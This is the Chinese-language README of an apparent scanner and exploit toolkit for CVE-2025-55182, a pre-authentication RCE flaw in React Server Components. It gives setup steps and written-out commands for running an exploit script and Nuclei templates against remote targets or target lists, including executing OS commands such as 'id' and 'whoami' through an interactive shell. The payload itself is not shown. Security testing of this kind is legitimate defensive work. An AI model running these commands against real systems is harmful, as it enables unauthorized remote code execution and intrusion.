
扫描与利用工具包,针对 CVE-2025-55182——React Server Components 中的一个严重预认证远程代码执行漏洞。包含检测、交互式 Shell、Docker 部署以及教育性技术分析。
一个针对 CVE-2025-55182 的综合安全测试工具包,该漏洞是 React 服务端组件中的一个严重的预认证远程代码执行(RCE)漏洞。
想 100% 理解这个漏洞吗?
📖 阅读我们的完整技术分析 - 你需要知道的一切:
- 为什么 React 在服务器上运行(不仅仅是浏览器!)
- 攻击如何运作(附可视化图解)
- 逐行解释漏洞利用代码
- 从入门概念到高级利用
- 无需任何前置条件!
非常适合: 安全报告、培训材料、威胁分析,或纯粹为了学习!
此漏洞影响 React 服务端组件 19.0.0 至 19.2.0 版本,受影响范围:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack影响: 未认证的攻击者可通过服务器函数(Server Function)端点对 HTTP 请求负载进行不安全的反序列化,从而远程执行任意代码。
👉 阅读完整技术分析 - 一份综合指南,涵盖:
非常适合:
无需任何前置知识 - 从基础开始,逐步进阶到高级利用技术!
仅供教育和授权安全测试使用
本工具仅可用于:
警告: 未经授权访问计算机系统是违法的。用户有责任遵守所有适用的法律法规。作者对滥用本工具不承担任何责任。
无需任何依赖!使用单个 bash 脚本即可快速测试。
👉 EXPLOIT_SCRIPT.md - 独立脚本,具备以下功能:
# Single target
./exploit-cve-2025-55182.sh http://target.com
# Multiple targets
./exploit-cve-2025-55182.sh -f targets.txt
包含 Docker、Web UI 和 Nuclei 集成的完整工具包。请继续阅读下方安装说明。
选择你的安装方式:
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Start scanner
docker compose up
# Access web interface at http://localhost:3001
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Install Nuclei (macOS)
brew install nuclei
# Make scripts executable
chmod +x scripts/*.sh
📖 详细设置: 参见 SETUP_GUIDE.md 获取分步说明
⚡ 快速参考: 参见 QUICKSTART.md 了解常见用例
启动 Web 界面:
docker compose up
# Open browser: http://localhost:3001
启动(附带漏洞测试应用):
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# Vulnerable app: http://localhost:3000
Docker 用户请注意: 从 Docker 中扫描时,请使用:
http://host.docker.internal:3000 来扫描宿主机上的应用http://vulnerable-app:3000 来扫描容器化的漏洞应用https://example.com 用于外部目标http://localhost:3001创建本地漏洞应用并对其进行测试:
# Terminal 1: Start vulnerable app
./scripts/setup-vulnerable-app.sh
# App will run on http://localhost:3000
# Terminal 2: Test it
./scripts/test-local.sh
# Execute custom commands
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basic scan
./scripts/test-remote.sh https://target.com
# With command execution
./scripts/test-remote.sh https://target.com "id"
# Create targets file
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scan all targets
./scripts/test-multiple.sh targets.txt
基础漏洞检测:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
执行自定义命令:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
扫描多个目标:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v
CVE-2025-55182-Scanner/
├── README.md # Main documentation
├── EXPLOIT_SCRIPT.md # Standalone script guide
├── QUICKSTART.md # Quick start guide
├── SETUP_GUIDE.md # Detailed setup instructions
├── LICENSE # MIT License
│
├── exploit-cve-2025-55182.sh # Standalone exploit script
│
├── Dockerfile # Docker configuration
├── docker-compose.yml # Docker Compose setup
│
├── templates/ # Nuclei templates
│ ├── cve-2025-55182.yaml # Detection template
│ └── cve-2025-55182-interactive.yaml # Interactive RCE template
│
├── scripts/ # Helper scripts
│ ├── setup-vulnerable-app.sh # Setup local vulnerable app
│ ├── test-local.sh # Test local instance
│ ├── test-remote.sh # Test remote target
│ └── test-multiple.sh # Test multiple targets
│
├── web-ui/ # Web interface
│ ├── server.js # Express server
│ ├── package.json # Dependencies
│ └── public/
│ └── index.html # Frontend
│
├── vulnerable-app/ # Vulnerable test app (generated)
│ ├── Dockerfile # Docker config
│ └── ...
│
└── docs/ # 📚 Documentation
├── TECHNICAL.md # ⭐ COMPLETE vulnerability guide
│ # - How it works (basics to advanced)
│ # - Attack flow with diagrams
│ # - Payload analysis (every line explained)
│ # - Detection & prevention
│ # - Real-world examples
└── REMEDIATION.md # Fix instructions
docs/TECHNICAL.md ⭐ 最全面的资源
该漏洞源于 React 服务端组件中的不安全反序列化。攻击者可以:
child_process 模块的访问权限想确切地了解其工作原理吗?
这份综合指南包括:
✅ 为什么 React 服务端组件在服务器上运行(而不是浏览器)
✅ JavaScript 中原型污染的工作原理
✅ 带可视化图解的分步攻击流程
✅ 漏洞利用负载的每一个字节都得到解释
✅ 攻击者如何通过 JSON 实现代码执行
✅ 真实世界的概念验证示例
✅ 检测方法和防御策略
以通俗易懂的语言编写 - 不需要博士学位!一份文档即可带你从“React 基础”走到“完整利用”。
非常适合:
如果你正在运行存在漏洞的版本:
完整指南: docs/REMEDIATION.md - 完整的修复步骤
🎓 完整技术分析 - 我们的综合指南
为什么要阅读我们的技术指南?
使用者: 全球范围内的安全研究人员、开发者、渗透测试人员和教育工作者。
欢迎贡献!参与方式如下:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)本项目基于 MIT 许可证 授权 - 详情请参阅 LICENSE 文件。
StealthMoud
如果你觉得此工具好用,请 ⭐ 为本仓库加星以示支持!
Watch 本仓库以获取更新和新功能。
发布此工具旨在帮助安全专业人员识别并修复易受攻击的系统。请始终:
✅ 在测试前获得明确的书面授权
✅ 负责任地向受影响方报告发现
✅ 遵守所有适用的法律法规
❌ 绝不将该工具用于未经授权的访问
❌ 绝不将该工具用于恶意目的
请记住: 未经授权的计算机访问是犯罪行为。请负责任地开展测试。
| 功能 | 描述 |
|---|
| 🐳 Docker 支持 | 通过 Docker Compose 一键部署 |
| 🌐 Web 界面 | 面向非技术用户的友好 Web UI |
| 🔍 漏洞测试环境 | 快速启动本地漏洞应用,便于安全测试 |
| 🎯 远程扫描 | 测试外部目标是否存在漏洞 |
| ⚡ 交互式 Shell | 执行操作系统命令并实时查看结果 |
| 📊 多种扫描模式 | 仅检测模式或完整利用模式 |
| 📝 详细报告 | JSON 和文本输出格式 |
| 🔧 Nuclei 集成 | 借助 ProjectDiscovery 强大的扫描器 |